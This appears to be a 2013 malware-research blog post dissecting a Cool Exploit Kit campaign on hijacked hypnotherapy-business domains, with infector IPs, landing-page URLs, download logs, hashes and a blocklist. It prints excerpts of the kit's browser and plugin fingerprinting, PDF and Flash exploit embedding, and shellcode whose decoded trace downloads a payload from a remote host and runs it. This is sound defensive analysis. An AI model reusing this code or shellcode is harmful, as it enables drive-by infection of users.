I was hinted the url with the hostname of hypnotherapyaz.com (thank's to a crusader who I can't mention it here) which were match to IP of what other researcher's (@kafeine) tweet, and accidentally has a correlation to a hacked domain owner: Bob Faith of what MalwareMustDie Tango Team is currently processing. The part of investigation text can be found here -->>[PASTEBIN].
I also seek the possible domain names used by the suspected server, as per below:
50f2c40a75730.buyliftem.org A 64.120.190.183 50f3308d0dc4d.mentalfocus.org A 64.120.190.183 50f2d9ddf1471.azhypnotistbob.com A 64.120.190.183 50f2afa39be68.azreptheatre.com A 64.120.190.183 50f28a4b9a4fe.tempeazhomeloans.com A 64.120.190.183 50f30534b0cb0.hypnoaz.com A 64.120.190.183 50f34659158a0.mentalfocusaz.com A 64.120.190.183 50f31ac55ce66.hypnotherapyaz.com A 64.120.190.183
By knowing the possibility of the domain's landing page by reading references, I made the personal brute shell script for the possible landing page urls using the last strings of the suspected domains started from directory after news/ (and some others dirs too) to the landing pages like: Sale.Dilute.jsp, ray.dhtml, OPERATION.PHP5, etc etc..(the script was just made for FreeBSD only, after it's stable and supporting linux too we will upload it into our Google Project site).
All I did was just using the response 200 OK for the each calls in bruting the url, and the match just came up as per infector url below:
result of the IP 64.120.190.183:
Go back to the track, the insides (code) of the landing page URL were so similar so I just took the first one for this post's analysis. With the details below:
h00p://50f31ac55ce66.hypnotherapyaz.com/news/Guilt.phtm h00p://50f2d9ddf1471.azhypnotistbob.com/news/Bible.phps h00p://50f2d9ddf1471.azhypnotistbob.com/news/Guilt.phtm
by the domain names burped by the brute I saw a certain pattern, so I expanded the search with the same method to wider network to find the below urls came from IP: 72.46.132.214↓
h00p://50f2e82b777c7.bobfaith.com/news/ARCHBISHOP/OPERATION.PHP5 h00p://50f2e0e1f35ef.azhypnotistbob.com/news/ARCHBISHOP/OPERATION.PHP5 h00p://50f2cb535212f.azhypno.com/news/ARCHBISHOP/OPERATION.PHP5 h00p://50f2e82b777c7.bobfaith.com/news/Sun_Relinquish.aspx h00p://50f2e0e1f35ef.azhypnotistbob.com/news/Bible.phpsFYI, historically 72.46.132.214 was having below domain's pointer too of the same pattern of PseudoRandom Domain/DGA used by Cool Exploit Kit:
50f337d06c182.mentalfocus.org 50f3ec90cd3e0.sportsfocus.org 50f2a2c25a1f4.arizonareptheatre.com 50f2a86714d29.azreptheatre.com 50f289732df55.arizonarepertorytheatre.com 50f2b63491312.buyliftem.com 50f2cb535212f.azhypno.com 50f39fe3d7007.socialmediahypnotist.com 50f34d99e5ea9.quitsmokingaz.com 50f30c7628d58.hypnoaz.com 50f2f6b923593.healthhypnosisaz.com 50f2fdf67d0ad.healthhypnosisaz.com 50f33f178173a.mentalfocusaz.com 50f3294603c37.loseweightaz.com 50f322095740b.loseweightaz.com 50f3138673ee9.hypnotherapyaz.com 50f2bd7964ae8.buyliftem.net 50f282b40a901.bestbridalregistry.net
The landing page looks like below:
↑As you can see the typical landing page of Cool Exploit Kit.
I fetched the landing page:#MalwareMustDie!--19:28:07-- h00p://50f31ac55ce66.hypnotherapyaz.com/news/Guilt.phtm => `Guilt.phtm' Resolving 50f31ac55ce66.hypnotherapyaz.com... seconds 0.00, 64.120.190.183 Caching 50f31ac55ce66.hypnotherapyaz.com => 64.120.190.183 Connecting to 50f31ac55ce66.hypnotherapyaz.com|64.120.190.183|:80... seconds 0.00, connected. : GET /news/Guilt.phtm HTTP/1.0 Referer: http://www.google.com/search?q=youtube User-Agent: MalwareMustDie Draining Your Cool EK Host: 50f31ac55ce66.hypnotherapyaz.com : HTTP request sent, awaiting response... : HTTP/1.1 200 OK Server: nginx/1.2.6 Date: Mon, 14 Jan 2013 10:28:08 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.16 : 200 OK Length: unspecified [text/html] 19:28:09 (41.02 KB/s) - `Guilt.phtm' saved [16046]I neutralized with jinxed code here-->>[PASTEBIN] Without reading code you can grep the plain possible urls in it, to find below links:h00p://50f31ac55ce66.hypnotherapyaz.com/news/tentative.jar h00p://50f31ac55ce66.hypnotherapyaz.com/news/Shore_Rightly2.pdf h00p://50f31ac55ce66.hypnotherapyaz.com/news/live1.pdf h00p://50f31ac55ce66.hypnotherapyaz.com/news/INDUSTRIAL1.SWFOh yes, I drained it up, PoC:Here's all of the download logs as evidence :-) -->>[PASTEBIN] PS: the last attempt shown that the bad actors removed the jars:
$ cat tentative.jar <b>ERROR 404 CONTENT</b>Decoding & understanding how it infects us!
So let's peel the landing page code, this is a more structured code-->>[PASTEBIN] For the obfusctation, there were none. You'll see the condensed script and that's it. The trick of usage variable as wordings is used but wasn't difficult to figure it out. I wonder why a moronz must pay high price for a junk code like this. Honestly, I cannot say this is much smarter stuff than BHEK. Well, I will try to explain the infection part based on this structure.. In the first script it gets the Adobe version (self explanatory)try { control = new ActiveXObject('PDF.PdfCtrl'); } catch (e) {} } if (control) { isInstalled = true; version = control.GetVersions().split(','); version = version[0].split('='); version = parseFloat(version[1]); Roar=version; pull=true; } }in 2nd script it gets java ver of IE or Netscape(Mozilla):if(br=='MSIE') { if(this.ax('1.7.0')) { immense[0]='1.7.0'} else if(this.ax('1.6.0')) {immense[0]='1.6.0'} else if(this.ax('1.5.0')) { immense[0]='1.5.0'} else if(this.ax('1.4.2')) {immense[0]='1.4.2'} else if(this.tm()) {immense[0]='1.1'} } else if(br=='Netscape Family') { this.gj(); if(this.Heredity!=null) { immense[0]=this.Heredity} else if(this.tt('1.7')) {immense[0]='1.7.0'} else if(this.tt('1.6')) { immense[0]='1.6.0'} else if(this.tt('1.5')) {immense[0]='1.5.0' } else if(this.tt('1.4.2')) {immense[0]='1.4.2'} }This is how it checks browsers (see the ver. well):,g6:function() { if (this.Century == null) { var br=navigator.userAgent.toLowerCase(); if((br.indexOf('msie')!=-1)&&(br.indexOf('opera')==-1)) {this.Century='MSIE'; this.Sand='MSIE' } else if(br.indexOf('iphone')!=-1) {this.Century='Netscape Family'; this.Sand='iPhone' } else if((br.indexOf('firefox')!=-1)&&(br.indexOf('opera')==-1)) {this.Century='Netscape Family'; this.Sand='Firefox' } else if(br.indexOf('chrome')!=-1) {this.Century='Netscape Family'; this.Sand='Chrome' } else if(br.indexOf('safari')!=-1) {this.Century='Netscape Family'; this.Sand='Safari' } else if((br.indexOf('mozilla')!=-1)&&(br.indexOf('opera')==-1)) {this.Century='Netscape Family'; this.Sand='Other' } else if(br.indexOf('opera')!=-1) { this.Century='Netscape Family'; this.Sand='Opera' } else { this.Century='?'; this.Sand='unknown' } } return this.Century }How it exploits PDF(a function to be called by exploiter)function ATTENTIONAMATEUR(tactic, diameter, warrant) { var hey ='7221'; document.body.appendChild(document.createElement("p","8241")); document.body.appendChild(document.createElement("p","Microphone Acceptable Exaggerate Fond Tide")); } DETAIL.innerHTML = '<object data="/'+(((Roar>0)&&(Roar<8))?('news/Shore_Rightly2.pdf'):('news/live1.pdf'))+'" type="application/pdf" width="200" height="100"><embed src="/'+(((Roar>0)&&(Roar<8))?('news/Shore_Rightly2.pdf'):('news/live1.pdf'))+'" type="application/pdf" width="100" height="200" /></object>';How it exploit Flash via GetCN(function to be called by exploiter):function getCN() { return "/news/INDUSTRIAL1.SWF"Other parts of script is a shellcode (later explained), the rest part is not significant to discuss, except some straight PDF infectors in object tag html:<noscript> <object data="/news/live1.pdf" type="application/pdf" width="100" height="300"> <embed src="/news/live1.pdf" type="application/pdf" width="300" height="100" /></object> <object data="/news/Shore_Rightly2.pdf" type="application/pdf" width="300" height="300"><embed src="/news/Shore_Rightly2.pdf" type="application/pdf" width="200" height="200" /></object></noscript>The Shellcode & Payload
It has shellcode function vfsq snipped below (can be called openly too)function vfsq() {xz="%u"; var a="8282!05d4!60d4!d411!14e5!94c5!64c5!c5d4!b570!d4.. !e4b1!d181!7070!8521!c5c5!8504!2370!15e1!eee6!3733!2e2a!59.. !a23c!423c!babe!e7c2!b77d!3c42!82ba!c224!7de7!82b7!e324!8e.. !a4c5!f585!5382!fec6!1e97!0cb1!423a!7de7!8282!0d82!b704!b5.. !7d7d!0c94!3a0c!ce02!e3ba!c77d!4454!d5a5!8204!6482!0474!7d.. !24d2!3afd!0402!bd3a!eb3c!c5b2!42b1!8a55!0480!583a!3cb7!17.. !52b2!9e3e!c502!01ad!6983!3f72!deb1!58b2!964d!1e16!ddb1!80.. !d383!9a6c!b140!b2c5!6741!e43a!b13f!e502!e73a!8543!423a!3a.. !4ecf!6638!1414!1414!".split("").reverse().join(""); return a["replace"](/!/g,xz)we can use the Blackhole decode method, (please see the previous blog posts about manually decoding shellcode) to get the shellcode snipped below:41 41 41 41 66 83 e4 fc fc eb 10 58 31 c9 66 81 AAAAf......X1.f. e9 3c fe 80 30 28 40 e2 fa eb 05 e8 eb ff ff ff .<..0(@......... ad cc 5d 1c c1 77 1b e8 4c a3 68 18 a3 68 24 a3 ..]..w..L.h..h$. 58 34 7e a3 5e 20 1b f3 4e a3 76 14 2b 5c 1b 04 X4~.^...N.v.+\.. a9 c6 3d 38 d7 d7 90 a3 68 18 eb 6e 11 2e 5d d3 ..=8....h..n..]. af 1c 0c ad cc 5d 79 c1 c3 64 79 7e a3 5d 14 a3 .....]y..dy~.].. 5c 1d 50 2b dd 7e a3 5e 08 2b dd 1b e1 61 69 d4 \.P+.~.^.+...ai. 85 2b ed 1b f3 27 96 38 10 da 5c 20 e9 e3 25 2b .+...'.8..\...%+ : : : 4c 1f 18 18 1f 06 5b 47 4b 41 49 44 45 4d 4c 41 L.....[GKAIDEMLA 49 40 51 58 46 47 5c 41 5b 5c 06 4b 47 45 07 46 I@QXFG\A[\.KGE.F 4d 5f 5b 07 5c 4d 46 5c 49 5c 41 5e 4d 11 06 4d M_[.\MF\I\A^M..M 50 4d 28 28 PM((the last part is encoded url. You can XOR it with the FF key, or translate shellcode API into:0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255) 0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon) 0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\]) 0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://50f39fe3d7007.socialmediahypnotist.com/news/tentative9.exe, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll) 0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0) 0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0) 0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)to get the payload url below:h00p://50f39fe3d7007.socialmediahypnotist.com/news/tentative9.exeOh, of course I fetched the payload:HTTP request sent, awaiting response... HTTP/1.1 200 OK Server: nginx/0.8.55 Date: Mon, 14 Jan 2013 10:47:25 GMT Content-Type: application/x-msdownload Connection: keep-alive X-Powered-By: PHP/5.3.16 Pragma: public Expires: Mon, 14 Jan 2013 10:47:26 GMT Cache-Control: must-revalidate, post-check=0, pre-check=0 Cache-Control: private Content-Disposition: attachment; filename="contacts.exe" Content-Transfer-Encoding: binary Content-Length: 171008 200 OK Registered socket 1896 for persistent reuse. Length: 171,008 (167K) [application/x-msdownload] 19:47:29 (49.03 KB/s) - `tentative9.exe' saved [171008/171008]Here it is:The binary looks like below details (you'll see Microsoft's nslookup.exe a Russian compilation version..a stupid LOL :-)
ExifTool : SubsystemVersion.........: 5.0 LinkerVersion............: 9.0 ImageVersion.............: 0.0 FileSubtype..............: 0 FileVersionNumber........: 5.1.2600.5512 UninitializedDataSize....: 0 LanguageCode.............: Russian FileFlagsMask............: 0x003f CharacterSet.............: Unicode InitializedDataSize......: 167424 FileOS...................: Windows NT 32-bit MIMEType.................: application/octet-stream LegalCopyright...........: . . FileVersion..............: 5.1.2600.5512 (xpsp.080413-2113) TimeStamp................: 2013:01:14 05:53:59+00:00 FileType.................: Win32 DLL PEType...................: PE32 InternalName.............: nslookup.exe ProductVersion...........: 5.1.2600.5512 FileDescription..........: nslookup APP OSVersion................: 5.0 OriginalFilename.........: nslookup.exe Subsystem................: Windows GUI MachineType..............: Intel 386 or later, and compatibles CompanyName..............: CodeSize.................: 2560 ProductName..............: Microsoft Windows ProductVersionNumber.....: 5.1.2600.5512 EntryPoint...............: 0x1330 ObjectFileType...........: Executable application Compilation timedatestamp: 2013-01-14 05:53:59 Target machine...........: 0x14C (Intel 386 or later processors and compatible processors) Entry point address......: 0x00001330 Hex: 0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ.............. 0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@....... 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0030 00 00 00 00 00 00 00 00 00 00 00 00 E0 00 00 00 ................ 0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th 0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno 0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS 0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$....... 0080 A2 87 94 C0 E6 E6 FA 93 E6 E6 FA 93 E6 E6 FA 93 ................ 0090 68 F9 E9 93 D2 E6 FA 93 C1 20 81 93 E3 E6 FA 93 h........ ...... 00A0 E6 E6 FB 93 86 E6 FA 93 E6 E6 FA 93 E7 E6 FA 93 ................ 00B0 F8 B4 79 93 E7 E6 FA 93 F8 B4 6E 93 E7 E6 FA 93 ..y.......n..... 00C0 F8 B4 6B 93 E7 E6 FA 93 52 69 63 68 E6 E6 FA 93 ..k.....Rich.... 00D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00E0 50 45 00 00 4C 01 07 00 77 9D F3 50 00 00 00 00 PE..L...w..P.... : : :Virus Total report of the payload:SHA256: 212eae2b7cc22585dfdfdb3e1046b4dc56c31561a2b20f7f093bc8d9a5d78534 SHA1: 0ba1ab63f821d0e52d4b03780c13e24da9233c98 MD5: d3aa34ec10b0fe1efa2e1e17058c7697 File size: 167.0 KB ( 171008 bytes ) File name: d3aa34ec10b0fe1efa2e1e17058c7697 File type: Win32 DLL Tags: pedll Detection ratio: 2 / 35 Analysis date: 2013-01-14 08:41:03 UTC ( 4 hours, 47 minutes ago ) URL --->>[VirusTotal] Names: Malwarebytes : Trojan.FakeMS Norman : W32/Kryptik.GBT↑I bet the payload is Reveton. I don't have enough time left in this crusade to start analyzing all samples yet, but made a detection ratio for positive samples based on VT report as per below: (click the numbers in the left part for link to VT)No. Date Time Size FileName VT MD5 ------------------------------------------------------------------------------------- [1] 2013/01/14 19:28 16,046 Guilt.phtm 0/46 36c48f20a9badcffc4164558953eda42 [2] 2013/01/14 19:59 7,245 INDUSTRIAL1.SWF 2/46 49b376cc6f7d6e229b7ab1a2daa21e17 [3] 2013/01/14 19:57 9,660 live1.pdf 1/46 863d68bacfbddb042bdb1640cee68185 [4] 2013/01/14 19:55 20,190 Shore_Rightly2.pdf 7/29 10ad085df6e92258727695e186d22ce0 [5] 2013/01/14 19:47 171,008 tentative9.exe 9/46 d3aa34ec10b0fe1efa2e1e17058c7697Samples
Samples are shared to increase AV detection ratio + research purpose-->>[HERE]
Source of infection
These are IP of the active Cool Exploit Kit malware infectors (monitored so far), blocking access to these IPs will be a very recommendable advice. If you think I am paranoia see this list -->>[PASTEBIN]64.120.190.183 46.165.209.218 46.28.71.85 188.120.230.142 193.150.0.202 173.237.198.25 178.63.150.225 31.131.27.114 184.82.27.130 67.211.197.32 185.10.211.11 5.199.135.103 91.241.16.236 188.190.99.189 195.189.246.106 46.28.71.26.. & some more IPs which are still under shifting. I will update regularly. *) The post will be updated regularly (after work), pls bear if correction occurred. *) For the Cool EK'S reference Google search resulted good ones-->>[GOOGLE] *) Latest CURRENT Infection of Cook EK in URLQuery-->>[HERE]
